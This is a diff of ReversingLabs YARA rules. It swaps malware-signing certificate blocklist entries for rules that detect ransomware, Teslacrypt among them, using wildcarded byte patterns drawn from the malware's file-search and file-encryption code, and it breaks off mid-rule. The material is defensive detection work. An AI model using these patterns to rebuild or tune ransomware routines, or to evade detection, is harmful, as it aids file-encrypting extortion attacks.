-		id = "a75cc09f-de73-5db4-9ace-189e8da99053"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3616-L3634"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7c5c84cb9071eff6a1bd7062506b807466bb4a432d1ed073961898c6c08cc4bd"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 8B E9 C7 44 24 ?? ?? ?? ?? ?? 33 DB 89 6C 24 ??
+            56 0F 57 C0 66 C7 44 24 ?? ?? ?? 57 66 0F 13 44 24 ?? B2 ?? 88 5C 24 ?? 8B CB 8A C1
+            02 C2 30 44 0C ?? 41 83 F9 ?? 73 ?? 8A 54 24 ?? EB ?? 8B CD 88 5C 24 ?? E8 ?? ?? ??
+            ?? 8D 54 24 ?? 8B C8 E8 ?? ?? ?? ?? 85 C0 75 ?? 40 E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 51 BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B D6 E8 ?? ?? ?? ?? 59 56 BE
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8D 4C 24 ?? 6A
+            ?? 8B D5 E8 ?? ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B C1 8B 94 24 ?? ?? ?? ?? 0B C2 0F 84 ??
+            ?? ?? ?? 6A ?? 5D 3B D3 77 ?? 81 F9 ?? ?? ?? ?? 76 ?? 2B CD 1B D3 52 51 55 8D 4C 24
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B C5 0F 85 ?? ?? ?? ?? 8B CD 8B C3 8A 90 ?? ?? ?? ?? 49
+            8A B0 ?? ?? ?? ?? 3A D6 75 ?? 40 85 C9 75 ?? 8B CB EB ?? 0F B6 C6 0F B6 CA 2B C8 85
+            C9 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 8B D6 50 B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 88 19 41 83 E8 ?? 75 ??
+            8B 6C 24 ?? 8B 7C 24 ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 2B C7 1B CD 3B EB
+        }
+		$encrypt_files_p2 = {
+            7C ?? 7F ?? 81 FF ?? ?? ?? ?? 72 ?? 8B AC 24 ?? ?? ?? ?? 0F 57 C0 8B BC 24 ?? ?? ??
+            ?? 8B 4C 24 ?? 55 57 66 0F 13 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 59 59 8B 4C 24 ??
+            3B CB 77 ?? 3B C3 77 ?? 8B F3 EB ?? 3B CB 77 ?? 72 ?? 3D ?? ?? ?? ?? 72 ?? B8 ?? ??
+            ?? ?? 55 57 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 F6 0F 88 ?? ?? ?? ?? 74
+            ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 56 50 8B D0 E8 ?? ?? ?? ?? 55 57 56 BA ?? ?? ?? ??
+            8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 88 ?? ?? ?? ?? 99 03 F8 13 EA E9 ?? ??
+            ?? ?? 6A ?? 58 89 1D ?? ?? ?? ?? 83 E8 ?? 75 ?? 8B C7 89 1D ?? ?? ?? ?? 0B C5 BE ??
+            ?? ?? ?? 74 ?? 51 8D 54 24 ?? E8 ?? ?? ?? ?? 59 B9 ?? ?? ?? ?? 3B F1 74 ?? 56 51 BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 55 57 BD ?? ?? ?? ?? 8B D1 55 8D 4C 24 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 0F 88 ?? ?? ?? ?? EB ?? BD ?? ?? ?? ?? 6A ?? 59 8B C1 BA ??
+            ?? ?? ?? C6 02 ?? 42 83 E8 ?? 75 ?? B8 ?? ?? ?? ?? C6 00 ?? 40 83 E9 ?? 75 ?? 6A ??
+            58 B9 ?? ?? ?? ?? C6 01 ?? 41 83 E8 ?? 75 ?? C6 06 ?? 46 83 ED ?? 75 ?? 6A ?? 8D 44
+            24 ?? 59 C6 00 ?? 40 83 E9 ?? 75 ?? B1 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? 8B C3 30 4C 04 ?? 40 83 F8 ?? 73 ?? 8A 4C 24 ?? EB ?? 8B 4C 24 ?? 8D 54 24 ??
+            88 5C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 8B F0 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B D6 E8 ??
+            ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 33 DB 43 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B C3 EB ?? 8D 4C
+            24 ?? E8 ?? ?? ?? ?? 33 C0 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_p3 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 55 56 57 6A ?? 5E 56 BF ?? ?? ?? ?? 57 FF 15
+            ?? ?? ?? ?? 51 BB ?? ?? ?? ?? BD ?? ?? ?? ?? 8B D3 8B CD E8 ?? ?? ?? ?? 59 56 57 FF
+            15 ?? ?? ?? ?? 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C6 C6 07 ?? 47
+            83 E8 ?? 75 ?? BF ?? ?? ?? ?? BA ?? ?? ?? ?? 53 8B CF E8 ?? ?? ?? ?? 59 6A ?? 58 C6
+            03 ?? 43 83 E8 ?? 75 ?? B9 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 3B E9 74 ?? 55 51 8B D6
+            E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3B C1 74 ?? 50 51 8B D6 E8 ??
+            ?? ?? ?? 83 C4 ?? 6A ?? 5B 53 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? B9 ?? ??
+            ?? ?? 50 51 8B D3 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 3B C8 74 ??
+            51 50 6A ?? 5A 8B C8 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B C1 74
+            ?? 50 51 8B D6 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3B C1 74 ?? 50
+            51 6A ?? 5A E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6A ?? 5B 3B C1 74
+            ?? 50 51 8B D3 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B C1 74 ?? 50
+            51 6A ?? 5A E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 8B D7 50 8D 4C 24 ?? E8 ?? ?? ?? ??
+            59 BA ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 59 59 83 64 24 ?? ?? 83 EB ??
+            75 ?? 21 9C 24 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 59 C6 00 ?? 40 83 E9 ?? 75 ?? 8B C6 C6
+            45 ?? ?? 45 83 E8 ?? 75 ?? C6 07 ?? 47 83 EE ?? 75 ?? 33 C0 5F 40 5E 5D 5B 8B E5 5D
+            C3
+        }
+		$find_files_p1 = {
+            55 8B EC 83 EC ?? 53 56 6A ?? 59 E8 ?? ?? ?? ?? 8B F0 66 C7 45 ?? ?? ?? 33 DB 89 35
+            ?? ?? ?? ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ??
+            ?? 66 C7 45 ?? ?? ?? 02 C8 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8D 45 ?? 88
+            5D ?? 50 8D 55 ?? 8B CE E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? B0 ?? 59 B1 ?? 88 5D ??
+            32 C1 88 4D ?? 88 45 ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            66 C7 45 ?? ?? ?? 88 5D ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ??
+            8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1
+            C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 80 44
+            05 ?? ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59
+            6A ?? 33 C9 C7 45 ?? ?? ?? ?? ?? 5B B0 ?? 88 5D ?? 32 C3 88 4D ?? 88 45 ?? 8B C1 C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 88 4D ?? 80 44 05 ?? ?? 40 83 F8 ?? 72 ?? 8B
+            0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 6A ?? 88 5D ?? B2 ?? 66 C7 45
+            ?? ?? ?? 33 C9 66 C7 45 ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 5B 8D
+            04 0A 30 44 0D ?? 41 3B CB 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 6A ?? 33 C9 C6 45 ?? ?? 58 34 ?? 88 4D ?? 88 45
+        }
+		$find_files_p2 = {
+            B2 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8D 04 0A 30 44 0D
+            ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? C6 45 ??
+            ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 80 F3 ?? C6 45 ?? ?? 88 5D ?? 8D 55 ??
+            33 DB C6 45 ?? ?? 50 88 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 59 59 6A ?? 58 34 ?? C6 45 ?? ?? 88 45 ?? B2 ?? 88 5D ?? 8B CB C7 45 ?? ?? ?? ??
+            ?? 66 C7 45 ?? ?? ?? 88 5D ?? 8D 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ??
+            8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 66 C7 45 ?? ?? ??
+            8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 80 44 05 ?? ??
+            40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? B0 ?? C6 45
+            ?? ?? 34 ?? 88 5D ?? 59 88 45 ?? B1 ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A
+            4D ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 0F 28 05
+            ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? 88 5D ?? 8A
+            45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ??
+            E8 ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3
+        }
+		$find_folders = {
+            55 8B EC 83 EC ?? 53 56 6A ?? 59 E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 33 DB 8B F0 66
+            C7 45 ?? ?? ?? 89 35 ?? ?? ?? ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8D 45 ??
+            88 5D ?? 50 8D 55 ?? 8B CE E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? B0 ?? 59 B1 ?? 88 5D
+            ?? 32 C1 88 4D ?? 88 45 ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 66 C7 45 ?? ?? ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45
+            ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 C7 45
+            ?? ?? ?? ?? ?? 88 45 ?? B2 ?? C7 45 ?? ?? ?? ?? ?? 8B CB 66 C7 45 ?? ?? ?? 88 5D ??
+            8D 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50
+            8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 C7 45 ?? ??
+            ?? ?? ?? 88 45 ?? 8B C3 C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 80 44 05 ??
+            ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 66 C7
+            45 ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 80 44
+            05 ?? ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59
+            66 C7 45 ?? ?? ?? B1 ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 66 C7 45 ?? ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8B 0D ?? ??
+            ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? B2 ?? C7 45
+            ?? ?? ?? ?? ?? 8B CB C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8D
+            04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D
+            55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ltd. \"Eve Beauty\"" and ( pe.signatures [ i ] . serial == "00:c7:50:5e:74:64:e0:0e:c1:dc:cd:8d:1b:46:6d:15:ff" or pe.signatures [ i ] . serial == "c7:50:5e:74:64:e0:0e:c1:dc:cd:8d:1b:46:6d:15:ff" ) and 1583824676 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_folders and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Cbf91988Fb83511De1B3A7A520712E9C : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Teslacrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Teslacrypt ransomware."
 		author = "ReversingLabs"
-		id = "d2d71058-f7b9-594f-b099-75aa4774306f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "842dae76-573c-564d-b658-ccdda451df21"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3636-L3654"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Teslacrypt.yara#L1-L665"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5862a8ec43d2e545f36b815ada2bb31c4384a8161c6956a31f3bd517532923fd"
+		logic_hash = "cc054be68d833d9f29a4ebd1c202922881b0d22a2605edc7def1048dc08f6325"
 		score = 75
-		quality = 90
-		tags = "INFO, FILE"
+		quality = 65
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Teslacrypt"
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ltd. \"Eve Beauty\"" and ( pe.signatures [ i ] . serial == "00:cb:f9:19:88:fb:83:51:1d:e1:b3:a7:a5:20:71:2e:9c" or pe.signatures [ i ] . serial == "cb:f9:19:88:fb:83:51:1d:e1:b3:a7:a5:20:71:2e:9c" ) and 1578786662 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Ce3675Ae4Abfe688870Bcacb63060F4F : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "586c9de9-e1b0-5d17-9783-c9e18dfdf463"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3656-L3674"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0c6f2ef55bef283a3f915fd8c1ced27c3c665f7f490caeea0f180c2d7fa2b2b5"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$file_search_0_3_1_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ??
+            51 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 B5 01 00 00 53 8B 1D ?? ?? ?? ?? 57 8B BC 24 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ??
+            83 3D ?? ?? ?? ?? ?? 0F 85 89 01 00 00 F6 44 24 ?? ?? 0F 84 D2 00 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
+            1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84
+            29 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 49 ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83
+            C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 EA 00 00 00 56 8D 94 24 ?? ?? ?? ?? 68
+        }
+		$file_search_0_3_1_2 = {
+            52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 7E FE FF FF 83 C4 ?? E9 93 00 00 00 56 8D 8C 24 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 24 ??
+            50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ??
+            85 FF 74 25 85 C0 75 35 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 23 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? EB
+            11 85 C0 74 10 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? ?? ??
+            0F 84 6A FE FF FF 55 FF 15 ?? ?? ?? ?? 5F 5B 8B 8C 24 ?? ?? ?? ?? 5E 5D 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$file_search_0_3_3_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ??
+            51 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 57 02 00 00 53 8B 1D ?? ?? ?? ?? 57 8B BC 24 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ??
+            83 3D ?? ?? ?? ?? ?? 0F 85 2B 02 00 00 F6 44 24 ?? ?? 0F 84 74 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
+            1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84
+            CB 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 49 ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83
+            C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 8C 01 00 00 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            52 E8 ?? ?? ?? ?? 8B C6 83 C4 ?? 8D 50 ?? 8B FF 66 8B 08 83 C0 ?? 66 85 C9 75 F5 2B C2 D1 F8 83 F8 ?? 76 1A 68 ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
+        }
+		$file_search_0_3_3_2 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51
+            ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 E8 00 00 00 8D 8C 24 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB
+            05 1B C0 83 D8 ?? 85 C0 0F 84 A9 00 00 00 8D 84 24 ?? ?? ?? ?? 57 50 E8 DC FD FF FF 83 C4 ?? E9 93 00 00 00 56 8D 8C 24
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 44
+            24 ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 FF 74 25 85 C0 75 35 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 23 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ??
+            ?? EB 11 85 C0 74 10 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 55 FF D3 85 C0 74 0D 83 3D ?? ?? ??
+            ?? ?? 0F 84 C8 FD FF FF 55 FF 15 ?? ?? ?? ?? 5F 5B 8B 8C 24 ?? ?? ?? ?? 5E 5D 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$file_search_0_3_4a_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? 57 50 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 57 51 66 89 BC
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F
+            84 99 02 00 00 8B BC 24 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 76 02 00 00 F6 44 24 ?? ?? 0F 84 6B
+            01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 38 02 00 00 8D 4C 24 ?? 51 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 1E 02 00 00 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? 83 F8 ?? 76 1A 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D
